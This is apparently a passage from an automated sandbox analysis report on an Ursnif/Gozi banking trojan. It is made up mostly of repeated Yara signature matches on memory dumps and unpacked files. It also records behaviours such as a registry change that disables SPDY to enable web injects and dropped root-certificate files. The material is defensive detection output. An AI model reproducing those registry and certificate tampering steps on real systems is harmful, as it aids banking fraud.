Source: Yara match File source: 00000023.00000003.682621929.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.442938704.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003E.00000002.795032491.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.683222673.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Lx6.exe PID: 1172, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 4292, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 3124, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4372, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4552, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 5832, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 1920, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6064, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csc.exe PID: 5836, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cvtres.exe PID: 1716, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csc.exe PID: 3536, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cvtres.exe PID: 5240, type: MEMORYSTR
Source: Yara match File source: 0.3.Lx6.exe.d294a0.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Lx6.exe.420000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.Lx6.exe.d294a0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.Lx6.exe.109d4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.Lx6.exe.109d4a0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.Lx6.exe.111c4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.Lx6.exe.1148948.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000043.00000000.773575293.000001FA9D6F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.389553565.000000000109D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.493910135.000000000111D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000043.00000000.771438221.000001FA9D6F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.667603922.000001489BB00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.389654961.000000000111C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000043.00000000.769688179.000001FA9D6F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000000.703497252.000001CEDB3E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003E.00000000.763965956.0000019933F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000000.596069262.000002240CA50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000000.704474059.000001CEDB3E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003E.00000000.762259112.0000019933F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000000.681894423.0000000003020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000059.00000000.816576347.000001AF8B6D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003E.00000000.760746671.0000019933F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.495743811.0000000000D29000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000000.702640862.000001CEDB3E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000059.00000000.818431890.000001AF8B6D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000059.00000000.820005242.000001AF8B6D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.656463020.000001489BB00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000058.00000000.802729381.0000024EF5620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000000.625911169.000001D023AD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000000.630294105.000001D023AD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000000.590960903.000002240CA50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000000.680178718.0000000003020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.814285126.0000021F457F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000000.576910703.000002240CA50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.495247062.0000000001148000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000000.681232862.0000000003020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.497852767.0000000001181000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000058.00000000.801073925.0000024EF5620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000058.00000000.799390295.0000024EF5620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000000.635166996.000001D023AD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.673085569.000001489BB00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

E-Banking Fraud
barindex
Yara detected Ursnif
Source: Yara match File source: 00000000.00000003.345037637.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.448346739.0000021F4E42C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.797117196.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.344925782.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.712648005.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000003.708638922.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.685282476.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.856104544.000001489B502000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000002.721107955.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.345194769.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.345092170.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.682986739.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000058.00000003.814825751.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000058.00000003.803878408.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.683117141.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003E.00000003.767939746.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003E.00000003.765039957.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003E.00000003.765207667.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000059.00000002.827171942.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.390766199.0000000000F9F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.683052464.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.389500778.000000000119B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003E.00000003.767821170.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.344972569.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.682539634.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.345107606.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.682736014.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.712982128.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000043.00000002.778497815.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000058.00000003.814713525.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.390744160.000000000119B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.860622856.000002240CD02000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.345011461.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000059.00000003.822550991.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000003.705598553.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000059.00000003.822358925.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000002.856230458.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000003.705458137.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.682832881.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000043.00000003.775181381.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000058.00000003.803740044.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.451792745.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.344881693.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.344788105.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.389768028.000000000119B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000003.708468891.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000043.00000003.775368587.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.682410000.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.858783348.000001D023E02000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.682621929.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.442938704.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003E.00000002.795032491.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.683222673.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Lx6.exe PID: 1172, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 4292, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 3124, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4372, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4552, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 5832, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 1920, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6064, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csc.exe PID: 5836, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cvtres.exe PID: 1716, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csc.exe PID: 3536, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cvtres.exe PID: 5240, type: MEMORYSTR
Source: Yara match File source: 0.3.Lx6.exe.d294a0.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Lx6.exe.420000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.Lx6.exe.d294a0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.Lx6.exe.109d4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.Lx6.exe.109d4a0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.Lx6.exe.111c4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.Lx6.exe.1148948.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000043.00000000.773575293.000001FA9D6F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.389553565.000000000109D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.493910135.000000000111D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000043.00000000.771438221.000001FA9D6F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.667603922.000001489BB00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.389654961.000000000111C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000043.00000000.769688179.000001FA9D6F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000000.703497252.000001CEDB3E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003E.00000000.763965956.0000019933F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000000.596069262.000002240CA50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000000.704474059.000001CEDB3E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003E.00000000.762259112.0000019933F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000000.681894423.0000000003020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000059.00000000.816576347.000001AF8B6D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003E.00000000.760746671.0000019933F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.495743811.0000000000D29000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000000.702640862.000001CEDB3E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000059.00000000.818431890.000001AF8B6D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000059.00000000.820005242.000001AF8B6D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.656463020.000001489BB00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000058.00000000.802729381.0000024EF5620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000000.625911169.000001D023AD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000000.630294105.000001D023AD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000000.590960903.000002240CA50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000000.680178718.0000000003020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.814285126.0000021F457F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000000.576910703.000002240CA50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.495247062.0000000001148000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000000.681232862.0000000003020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.497852767.0000000001181000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000058.00000000.801073925.0000024EF5620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000058.00000000.799390295.0000024EF5620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000000.635166996.000001D023AD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.673085569.000001489BB00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Disables SPDY (HTTP compression, likely to perform web injects)
Source: C:\Windows\explorer.exe Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0 Jump to behavior
Drops certificate files (DER)
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\7C7B.bin\AuthRoot.pfx Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\7C7B.bin\Root.pfx Jump to dropped file
Too many similar processes found
Source: cmd.exe Process created: 51

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 00000000.00000003.345037637.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.345037637.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000004.00000003.448346739.0000021F4E42C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 0000002D.00000003.797117196.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.344925782.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.344925782.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 0000002D.00000003.712648005.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000029.00000003.708638922.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000023.00000002.685282476.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 0000001F.00000002.856104544.000001489B502000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000029.00000002.721107955.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.345194769.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.345194769.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.345092170.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.345092170.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000023.00000003.682986739.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000058.00000003.814825751.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000058.00000003.803878408.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000023.00000003.683117141.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 0000003E.00000003.767939746.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 0000003E.00000003.765039957.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 0000003E.00000003.765207667.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000059.00000002.827171942.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000023.00000003.683052464.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 0000003E.00000003.767821170.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.344972569.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.344972569.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000023.00000003.682539634.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.345107606.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.345107606.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000023.00000003.682736014.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 0000002D.00000003.712982128.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000043.00000002.778497815.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000058.00000003.814713525.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000013.00000002.860622856.000002240CD02000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.345011461.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.345011461.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000059.00000003.822550991.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000029.00000003.705598553.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000059.00000003.822358925.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 0000002D.00000002.856230458.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000029.00000003.705458137.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000023.00000003.682832881.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000043.00000003.775181381.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000058.00000003.803740044.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.451792745.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.344881693.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.344881693.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.344788105.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.344788105.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000029.00000003.708468891.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000043.00000003.775368587.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000023.00000003.682410000.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000002.498174750.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000002.498174750.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 0000001B.00000002.858783348.000001D023E02000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000023.00000003.682621929.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.442938704.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 0000003E.00000002.795032491.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000023.00000003.683222673.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: Process Memory Space: Lx6.exe PID: 1172, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
